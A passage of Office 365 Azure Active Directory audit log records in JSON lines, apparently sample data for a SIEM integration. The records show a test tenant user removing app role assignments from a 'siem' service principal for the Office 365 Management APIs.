{"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", 